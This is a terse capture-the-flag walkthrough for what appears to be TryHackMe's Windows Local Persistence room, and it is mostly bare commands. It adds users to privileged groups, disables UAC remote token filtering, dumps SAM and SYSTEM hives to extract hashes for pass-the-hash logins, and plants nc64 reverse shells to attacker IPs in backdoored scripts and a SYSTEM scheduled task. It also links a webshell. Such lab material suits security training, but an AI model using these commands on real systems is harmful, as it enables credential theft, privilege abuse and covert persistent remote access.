Windows Local Persistence

March 16, 2024

Task 1: Introduction

Task 2: Tampering With Unprivileged Accounts

For the flag1

net localgroup administrators thmuser0 /add

net localgroup "Backup Operators" thmuser1 /add

net localgroup "Remote Management Users" thmuser1 /add

evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
whoami /groups

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321

reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak

ls

python3 ~/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

ruby evil-winrm.rb -i 10.10.112.102 -u Administrator -H f3118544a831e728781d780cfdb9c1fa

For the flag 2

secedit /export /cfg config.inf
notepad config.inf

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

netuser thmuser2

ruby evil-winrm.rb -i 10.10.112.102 -u thmuser2 -p Password321

For the flag3

wmic useraccount get name,sid

cd /tools/pstools
dir

PsExec64.exe -i -s regedit

.\flag3.exe
whoami

Task 3: Backdooring Files

For the first flag on this task

cd /Windows/System32
notepad backdoor.ps1

```
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 10.9.193.229 4445"
C:\Windows\System32\calc.exe
```

For the second flag of this task

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

Task 4: Abusing Services

For the first flag for this task

For the second flag of this task

Task 5: Abusing Scheduled Tasks

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.9.193.229 4449" /ru SYSTEM
schtasks /query /tn thm-taskbackdoor

cd /tools/pstools
./PsExec64.exe -s -i regedit

schtasks /query /tn thm-taskbackdoor

Task 6: Local Triggered Persistence

For the first flag of this task

For the second flag of this task

PS. Change the name from MyBackdooooooor to MyBackdoor since the task needs the name correctly

For the third flag of this task

For the fourth flag of this task

Task 7: Backdooring the Login Screen / RDP

For the second flag of this task

Just click the ease of access

Task 8: Persisting Through Existing Services

Download the rev shell here

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx

For the second flag of this task

PreviousAlfred NextHacking with PowerShell

Last updated 1 year ago